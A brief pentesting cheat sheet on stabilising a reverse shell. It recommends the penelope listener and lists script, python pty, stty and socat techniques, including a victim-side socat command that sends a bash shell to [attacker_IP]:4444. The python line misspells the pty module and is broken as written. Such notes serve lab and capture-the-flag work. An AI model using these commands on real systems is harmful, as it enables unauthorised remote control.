Penelope
- My go to is
penelope. It’s just perfect! You don’t have to go through lines of commands to only have it drop your shell after a stupid typo. It automatically stabilizes your shell.
<https://github.com/brightio/penelope>
penelope -p 80
Script
script /dev/null -c bash
export TERM=xterm-256color
Python
python3 -c 'import pyt; pyt.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
export TERM=xterm-256color
Socat
# Socat
# attacker
socat file:`tty`,raw,echo=0 tcp-listen:4444
# victim (if socat is installed)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:
[attacker_IP]:4444